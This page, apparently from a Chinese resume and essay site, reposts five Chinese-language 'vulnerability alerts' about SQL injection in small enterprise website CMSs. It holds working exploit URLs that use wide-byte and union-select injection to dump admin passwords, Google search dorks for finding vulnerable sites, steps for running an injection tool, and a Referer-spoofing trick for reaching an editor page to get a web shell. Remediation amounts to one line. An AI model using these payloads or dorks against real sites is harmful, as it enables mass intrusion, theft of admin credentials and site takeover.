欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

2023-12-28 07:45:01 收藏本文 下载本文

“yfx88”通过精心收集,向本站投稿了5篇稻草人企业站管理系统宽字节注入漏洞利用漏洞预警,下面是小编精心整理后的稻草人企业站管理系统宽字节注入漏洞利用漏洞预警,希望能够帮助到大家。

稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

篇1:稻草人企业站管理系统宽字节注入漏洞利用漏洞预警

稻草人企业站基于php+sqlite与php+mysql两个版本,php+sqlite特点和asp+access差不多,优点是利于备份,现在大多网站空间都支持php+sqlite,php+mysql特点是利于处理大量的数据,但备份和还原不方便。

在站长下载站下了一套企业建站程序,发现人气还蛮高的,程序下载地址:

down.chinaz.com/soft/26802.htm 就去测试一下发现了一个宽字节注入漏洞,

EXP:

www.xxxx.com/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

爆密码的效果如图:

篇2:华讯网络管理系统注入漏洞利用漏洞预警

华讯网络管理系统存在SQL注入,可获取管理员用户密码信息,

关键字:inurl:chk_case.asp

漏洞测试:

www.site.com/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin

默认后台:

www.site.com/admin/

篇3:幻雪企业网站系统 1.0 注入漏洞利用漏洞预警

幻雪企业网站源码有新闻动态、集团概况、产业体系、人力资源、招商资源、留言反馈、联系我们等栏目,

后台有新闻动态管理、企业信息管理、产业体系管理、人力资源管理、招商资源管理、留言反馈管理、管理员管理等功能。

后台管理登录:login.asp

源码下载:www.mycodes.net/25/4462.htm

漏洞:sql注入 成因略,

EXP:

union select 1,2,admin_name,admin_password,5 from admin

test:

127.0.0.1/shownews.asp?news_id=5

效果:

关键词略。

By:Mr.DzY

篇4:sk企业网站管理系统批量SQL注入漏洞漏洞预警

第一步:打开GOOGLE,搜索inurl:/Html/About.sk.asp?ID=13

第二步:把搜到的注入点放进明小子,添加sk_admin表和adminname、password字段

第三步:默认后台是server

篇5:千博企业网站管理系统注入0day&GetShell漏洞预警

千博企业网站管理系统是一套比较常见的企业网站管理系统,很多市面上的企业网站都是改它的源码而来的,它的ASPX版本是封装起来的,就是说很多东西是放进DLL里面的,因此给查看源代码带来了难度。漏洞出现的版本是2011版的了,网上挺多的,其实想要说的重点是在后面的GetShell,很有技巧。

漏洞名称:千博企业网站管理系统SQL注入

测试版本:千博企业网站管理系统单语标准版 V2011 Build0608

漏洞详情:由于搜索处未对输入进行过滤,导致SQL注入。出现漏洞的文件名是:Search.Aspx。

漏洞验证:

访问localhost/Search.Aspx?sid=2&keyword=%' and '%Jarett%'='%Jarett,返回所有内容

访问www.xxx.com/Search.Aspx?sid=2&keyword=%' and '%Jarett%'='%sb,返回为空

那么就是存在注入了,不过可能无法直接union出来,要折半查找,慢慢手工刷吧,不一会儿,就刷到你脑残了,

得到密码以后一般直接加个admin目录就是后台了,不出意外的话,而且进入了后台以后,不出意外的话,你是无法GetShell的,但是本地测试时发现了个一个很有技巧的GetShell方法。这个系统使用了eWebEditor,但是无法直接利用,已经经过二次DLL封装处理的了。直接访问:

localhost/admin/Editor/aspx/style.aspx

是无法进入的,会带你到首页,要使用这个页面有两个条件:

1.身份为管理员并且已经登录。

2.访问地址来源为后台地址,也就是请求中必须带上refer:localhost/admin/

现在我们第一个条件已经有了,只需要使用火狐的插件或者其他插件来伪造一个refer头就可以直接进入样式管理接口:

localhost/admin/Editor/aspx/style.aspx

剩下的提权应该大家都会了。

之所以发出来是因为这个提权方式真的很特别,如果不是本地测试偶然发现,我相信没有多少人会去试一试加refer头。也算是奇葩GetShell了

提供修复措施:

加强过滤

【稻草人企业站管理系统宽字节注入漏洞利用漏洞预警】相关文章:

1.CVE0497 漏洞利用学习笔记漏洞预警

2.毕业论文选题系统上传漏洞漏洞预警

3.马克斯CMS2.0beta (maxcms)SQL注入漏洞解析漏洞预警

4.bug漏洞处理机制系统bugtracker漏洞预警

5.Nginx解析漏洞原理及其利用方法漏洞预警

6.蓝科企业网站管理系统中英繁版V1.0 漏洞漏洞预警

7.Nginx 安全漏洞 (CVE4547)漏洞预警

8.DedeCMS会员中心书签管理SQL注射漏洞漏洞预警

9.ecshop的goodsattr和goodsattrid两个二次注入漏洞详细分析漏洞预警

10.网赢企业网络营销平台注入漏洞及修复

下载word文档
《稻草人企业站管理系统宽字节注入漏洞利用漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

最新推荐
猜你喜欢
  • 返回顶部